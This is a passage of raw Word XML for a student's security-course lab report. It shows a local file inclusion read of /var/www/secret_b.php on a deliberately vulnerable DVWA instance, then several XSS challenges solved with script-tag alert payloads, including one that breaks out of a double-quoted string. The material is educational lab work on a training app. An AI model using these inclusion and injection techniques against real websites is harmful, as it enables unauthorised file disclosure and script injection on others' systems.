        <w:t>The code simply retrieves the PHP file requested with the “page” URL query parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B668E3" w14:textId="77777777" w:rsidR="001E73BC" w:rsidRDefault="001E73BC" w:rsidP="001E73BC">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23BA2F12" w14:textId="35F7F52B" w:rsidR="00AB5AD9" w:rsidRDefault="00AB5AD9" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To retrieve the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F262E2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/var/www/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F262E2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>secret_b.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F262E2">
        <w:t xml:space="preserve">file contents </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in my browser, all I did was change the URL to </w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidRPr="006155C7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://comp4108.ca:9999/dvwa/vulnerabilities/fi/?page=/var/www/secret_b.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>, and I got this (truncated):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CFA25F" w14:textId="47749288" w:rsidR="00AB5AD9" w:rsidRDefault="00AB5AD9" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB5AD9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70E5CBD5" wp14:editId="6E539154">
            <wp:extent cx="5943600" cy="25888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588895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E263DC0" w14:textId="7BFDEF19" w:rsidR="00AB5AD9" w:rsidRDefault="00AB5AD9" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57CA9B93" w14:textId="68AB0532" w:rsidR="00AB5AD9" w:rsidRDefault="00AB5AD9" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>I then confirmed this was correct with the VM (truncated):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4ED779" w14:textId="68DF99C3" w:rsidR="00AB5AD9" w:rsidRDefault="00AB5AD9" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB5AD9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="165818BF" wp14:editId="7116A071">
            <wp:extent cx="5943600" cy="2635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635250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="651AB0AB" w14:textId="1CB32A09" w:rsidR="00AB5AD9" w:rsidRDefault="00AB5AD9" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="206055DE" w14:textId="4D833480" w:rsidR="00AB5AD9" w:rsidRDefault="00AB5AD9" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>The vulnerability in this case is that the PHP code will blindly retrieve and display any PHP file provided for the “page” query parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D81F0E9" w14:textId="3D03EF64" w:rsidR="00AB5AD9" w:rsidRDefault="00AB5AD9" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DB1638A" w14:textId="77777777" w:rsidR="00F262E2" w:rsidRDefault="00F262E2">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B039383" w14:textId="0FDA8873" w:rsidR="00AB5AD9" w:rsidRDefault="00F262E2" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Question 4 </w:t>
      </w:r>
      <w:r w:rsidR="00AB5AD9">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462804E5" w14:textId="2A088D64" w:rsidR="00AB5AD9" w:rsidRDefault="00AB5AD9" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>The PHP code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2524F23F" w14:textId="7B6D0981" w:rsidR="00AB5AD9" w:rsidRDefault="00AB5AD9" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB5AD9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AECB4E7" wp14:editId="45E4F3E2">
            <wp:extent cx="4848902" cy="1609950"/>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48902" cy="1609950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="211282FD" w14:textId="54D3E98C" w:rsidR="00AB5AD9" w:rsidRDefault="004F79FA" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This code first retrieves the file, and then removes any substrings in the file’s contents that match “http://” or “https://”. Obviously, this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>doesn’t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> require any changes to our exploit, given what we are trying to do in this specific scenario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353AEE06" w14:textId="30CA3EC9" w:rsidR="004F79FA" w:rsidRDefault="004F79FA" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59D7805B" w14:textId="5CD495E6" w:rsidR="004F79FA" w:rsidRDefault="004F79FA" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>I changed my security level to medium, and then I used the same URL without any changes. I again got back the same result as in the screenshot I gave for the low security version. I additionally confirmed that the “security” cookie was set to “medium”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A424272" w14:textId="60AA9F88" w:rsidR="00AB5AD9" w:rsidRDefault="004F79FA" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="004F79FA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73FA014C" wp14:editId="15DD2A40">
            <wp:extent cx="5943600" cy="10033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003300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB70CC9" w14:textId="65722F78" w:rsidR="004F79FA" w:rsidRDefault="004F79FA" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6893EE20" w14:textId="482D93BF" w:rsidR="004F79FA" w:rsidRDefault="004F79FA" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1789DC7B" w14:textId="09F7F7F4" w:rsidR="004F79FA" w:rsidRDefault="004F79FA" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Challenge </w:t>
      </w:r>
      <w:r w:rsidR="00A65D60">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F00125" w14:textId="26C0720B" w:rsidR="00936B2D" w:rsidRPr="00936B2D" w:rsidRDefault="00936B2D" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Display an alert box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13437ED5" w14:textId="234888C5" w:rsidR="004F79FA" w:rsidRDefault="00A65D60" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability: Injecting HTML directly into the DOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B3AAEF" w14:textId="6F43401B" w:rsidR="00A65D60" w:rsidRDefault="00A65D60" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation process: Entered “&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>“Hello, world!”);&lt;/script&gt;” into the text field, and pressed “Inject!”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FF35E9" w14:textId="48B7C4A9" w:rsidR="00A65D60" w:rsidRDefault="00A65D60" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0064FB" w14:textId="48AB0280" w:rsidR="00A65D60" w:rsidRDefault="00A65D60" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65D60">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="788B5EBD" wp14:editId="15BE82C2">
            <wp:extent cx="3791479" cy="2467319"/>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1479" cy="2467319"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="638BC0EA" w14:textId="410EFCB7" w:rsidR="00A65D60" w:rsidRDefault="00A65D60" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7701CC52" w14:textId="543FA59D" w:rsidR="00A65D60" w:rsidRDefault="00A65D60" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Challenge 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2501AEC1" w14:textId="2AFC5A70" w:rsidR="00936B2D" w:rsidRDefault="00936B2D" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Display an alert box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4616A2D8" w14:textId="77777777" w:rsidR="00936B2D" w:rsidRDefault="00936B2D" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28C1619C" w14:textId="4C99DF41" w:rsidR="00B0203F" w:rsidRDefault="00B0203F" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Protection: Both double and single quotes sanitized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF312C9" w14:textId="77777777" w:rsidR="00B0203F" w:rsidRPr="00B0203F" w:rsidRDefault="00B0203F" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27A7B43B" w14:textId="6E6347D1" w:rsidR="00D04154" w:rsidRDefault="00D04154" w:rsidP="00D04154">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerability: As with many things in JavaScript, the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F262E2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F262E2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> function is designed to work no matter what you provide to it. For example, you could provide a JavaScript object, a number literal, etc. – the only thing that is more difficult is </w:t>
      </w:r>
      <w:r w:rsidR="00B0203F">
        <w:t xml:space="preserve">string literals. Even providing nothing to the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B0203F" w:rsidRPr="00F262E2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B0203F" w:rsidRPr="00F262E2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00B0203F">
        <w:t xml:space="preserve"> function works. Here the goal is only to display an alert, regardless of the alert content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108702ED" w14:textId="268809C7" w:rsidR="00B0203F" w:rsidRDefault="00B0203F" w:rsidP="00D04154">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BEBDC4D" w14:textId="4BF1DCB8" w:rsidR="00B0203F" w:rsidRDefault="00B0203F" w:rsidP="00D04154">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit with screenshot 1: “&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>25.7);&lt;/script&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AD63A0" w14:textId="63133A75" w:rsidR="00B0203F" w:rsidRDefault="00B0203F" w:rsidP="00D04154">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00B0203F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="187FCA7B" wp14:editId="7987A008">
            <wp:extent cx="2467319" cy="154326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67319" cy="1543265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B6758A" w14:textId="3EB2FC3A" w:rsidR="00B0203F" w:rsidRDefault="00B0203F" w:rsidP="00D04154">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C86ECB7" w14:textId="43D3063D" w:rsidR="00B0203F" w:rsidRDefault="00B0203F" w:rsidP="00B0203F">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit with screenshot 2: “&lt;script&gt;alert({</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>});&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/script&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73831961" w14:textId="257F8267" w:rsidR="00B0203F" w:rsidRDefault="00B0203F" w:rsidP="00D04154">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00B0203F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="247D8D0C" wp14:editId="7F98D710">
            <wp:extent cx="2438740" cy="1514686"/>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38740" cy="1514686"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BA75C6" w14:textId="573926DE" w:rsidR="00B0203F" w:rsidRDefault="00B0203F" w:rsidP="00D04154">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4694FDA5" w14:textId="709A5E10" w:rsidR="00B0203F" w:rsidRDefault="00B0203F" w:rsidP="00D04154">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit with screenshot 3: “&lt;script&gt;alert(undefined);&lt;/script&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E60E5F3" w14:textId="500E284B" w:rsidR="00B0203F" w:rsidRDefault="00B0203F" w:rsidP="00D04154">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00B0203F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A2CA4B4" wp14:editId="2DB776F7">
            <wp:extent cx="2400635" cy="148610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00635" cy="1486107"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7BCBD9" w14:textId="517946B4" w:rsidR="00D04154" w:rsidRDefault="00D04154" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="127F5CC1" w14:textId="77777777" w:rsidR="00F262E2" w:rsidRDefault="00F262E2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="349A3744" w14:textId="3F9A035A" w:rsidR="00B0203F" w:rsidRDefault="00B0203F" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploit with screenshot 3: “&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>1 == 1);&lt;/script&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7967C0F7" w14:textId="6CCEA696" w:rsidR="00B0203F" w:rsidRDefault="00B0203F" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00B0203F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6564239A" wp14:editId="4DB6C2AE">
            <wp:extent cx="2486372" cy="1533739"/>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86372" cy="1533739"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED9B596" w14:textId="24EA3EED" w:rsidR="00B0203F" w:rsidRDefault="00B0203F" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="497CD4A7" w14:textId="1427DC7F" w:rsidR="00B0203F" w:rsidRDefault="00B0203F" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit with screenshot 4: “&lt;script&gt;alert</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>();&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/script&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11335383" w14:textId="5DB949DA" w:rsidR="00D04154" w:rsidRDefault="00D04154" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00D04154">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28530B29" wp14:editId="14DFEB01">
            <wp:extent cx="2524477" cy="155279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24477" cy="1552792"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A9DDC3" w14:textId="3DABDE89" w:rsidR="00D04154" w:rsidRDefault="00D04154" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A90BA40" w14:textId="1D0891BF" w:rsidR="003C437A" w:rsidRDefault="00D04154" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Challenge 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5105A5A2" w14:textId="140560FB" w:rsidR="003C437A" w:rsidRDefault="003C437A" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Cause an alert box to pop up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6642A5" w14:textId="47177607" w:rsidR="003C437A" w:rsidRDefault="003C437A" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A17CC52" w14:textId="6D0F4457" w:rsidR="003C437A" w:rsidRDefault="003C437A" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Protection: The </w:t>
      </w:r>
      <w:r w:rsidR="002F24A6">
        <w:t>input is injected into a double-quoted string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655BD74D" w14:textId="0F5F9EE2" w:rsidR="002F24A6" w:rsidRDefault="002F24A6" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="625F0BE2" w14:textId="6CCC04BB" w:rsidR="002F24A6" w:rsidRDefault="002F24A6" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability: We can terminate the double-quoted string early by including a closing quote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DE6A8C" w14:textId="14AA7D5D" w:rsidR="002F24A6" w:rsidRDefault="002F24A6" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B981FF7" w14:textId="2156DA9E" w:rsidR="002F24A6" w:rsidRDefault="002F24A6" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation process: In entered “</w:t>
      </w:r>
      <w:r w:rsidRPr="002F24A6">
        <w:t>"&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F24A6">
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F24A6">
        <w:t>/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>” into the text input and pressed “Inject!”. This resulted in the following HTML result on the generated page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0DADC7" w14:textId="09F68D71" w:rsidR="002F24A6" w:rsidRDefault="002F24A6" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="002F24A6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59360DB4" wp14:editId="09B899F2">
            <wp:extent cx="2715004" cy="190526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15004" cy="1905266"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="529CE830" w14:textId="6B54DD1C" w:rsidR="002F24A6" w:rsidRDefault="002F24A6" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>And when the page is loaded, the alert is displayed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B358D5" w14:textId="5B39E4D8" w:rsidR="002F24A6" w:rsidRDefault="002F24A6" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="002F24A6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="570D26FB" wp14:editId="42FAA38E">
            <wp:extent cx="4306708" cy="162877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344"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4307310" cy="1629002"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC62B2A" w14:textId="2E0C9B50" w:rsidR="00845514" w:rsidRDefault="00845514" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34AF11AC" w14:textId="6673176D" w:rsidR="00845514" w:rsidRDefault="00845514" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
